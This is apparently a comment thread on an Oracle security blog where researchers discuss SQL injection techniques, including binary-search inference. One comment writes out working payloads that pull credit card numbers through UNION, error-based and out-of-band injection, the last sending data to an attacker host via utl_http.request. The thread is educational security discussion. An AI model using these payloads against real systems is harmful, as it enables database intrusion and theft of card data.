Pete Finnigan's Oracle security weblog

Joxean Koret says:

Eeeerr... You can almost always access data from other tables if you can inject something: Simply, inject an UNION.

Alexander Kornbrust says:

Why so complicated? In the vulnerable code there are much easier ways to get the data from other tables.

------------------------------------------
INPUT: Bud (Original statement)
select product_id, product_name
from product where product_name like 'Bud%';

------------------------------------------
--SQL Injection Using Union (In-Band)
INPUT: Bud' and 1=0 union select customer_i,cc_number from credit_card--

select product_id, product_name
from product where product_name like 'Bud' and 1=0 union select customer_i,cc_number from creditcard--%';

------------------------------------------
-- SQL Injection Using error messages (In-Band)
INPUT: ' or 1=utl_inaddr.get_host_address((select customer_icc_number from credit_card where rownum=1))--

select product_id, product_name
from product where product_name like '' or 1=utl_inaddr.get_host_address((select customer_icc_number from credit_card where rownum=1))--%';

------------------------------------------
-- SQL Injection Using (Out-of-band), requires
INPUT: ' and 1=utl_http.request('http://www.hacker.com/'(select customer_icc_number from credit_card where rownum=1 ))--

select product_id, product_name
from product where product_name like '' and 1=utl_http.request('http://www.hacker.com/'(select customer_icc_number from credit_card where rownum=1 ))--%';

------------------------------------------

More details (Blind, ...) in one of my sql injection presentations...
http://www.red-database-security.com/wp/confidence2009.pdf

Regards

Alexander

Co-Author of "SQL Injection Attacks and Defense" - Syngress

Pete says:

Hi Alex, Joxean

I am aware of all of the methods you suggest of course; indeed I have written about them here many times and also for other publications.

It will be nice if Jaromir can respond here to your observations, I think what he is trying to show - as i said above is inference and how it can be used to read data from other tables. I know others have written papers on a similar theme in the past - Chris Anley I think did so; i just thought it was nice that he shows step by step for those who do not know the technique how to "infer" data values.

cheers

Pete

Jaromir D.B. Nemec says:

Hi Pete,

Thanks for mentioning my document in your blog and the nice review.

Alex, Joxean - my intention was to point out the threat of SQL injection, so the performance and complexity of the approach was not the first criterion. Of course I agree the UNION or error message injection in your comments gives a much simple way to get the same result in the scenario of my example. Anyway I find the logarithmic search usable in some scenarios where the application provides only a limited output.

Regards,

Jaromir D.B. Nemec

Alexander KornbrustAlexander Kornbrust says:

Pete,

thanks for the clarification.
The sentence "Normal wisdom says that if you can only manipulate the where clause you cannot access the data in tables not included in the existing FROM clause" was confusing me. What is normal wisdom? Naive people?

The algorithm used by Jaromir is called "Binary Search" not "Newton-Raphson" (which is something different).

For details and differences between both algorithms, see wikipedia:
http://en.wikipedia.org/wiki/Binary_search
http://en.wikipedia.org/wiki/Newton-Raphson

And Jaromir's code is not guessing (Binary Guess), the code is searching (Binary Search) even if the source says something
different. ;-)

Jaromir,
In your logfile it took 91 attempts to guess the creditcard number "1929-10100-01". This can be even faster
using less than 50 attempts by using an enhanced implementation of the binary search.

Pete says:

Hi Alex,

No normal wisdom is not naive people.

Remember you have spent years looking at this stuff, 99.99% (thats not a scientific study by the way, its a "turn of phrase&quot of the rest of the population hasn't spent the time.

For people who don't know SQL injection and just know SQL, common sense "says" you cannot access data in a table that is not in the FROM clause from there WHERE clause by showing that data in the SELECT clause. That's all i mean

Of course we both know that it is possible; as i said before.

I also know its not Newton-Raphson, i mean it's a "similar" technique (again think commentary on someone elses paper not scientific research), homing in on the answer, Newton-Raphson is used where there are two unknowns, in Jaromir's case there is only one. I was trying to write commentary and liken the method to something I know, thats all.

cheers

Pete

Jaromir D.B. Nemec says:

To avoid confusion and to focus on the original idea I modified the setup. The vulnerable select returns only a Boolean information (available / not found).

@Alex - the mention of "guessing" goes back to the Number Guessing Game that was the inspiration. I will try to optimise the binary search as you suggested. But I have not much hope that this access method will end with performance comparable at least with FTS

Regards,

Jaromir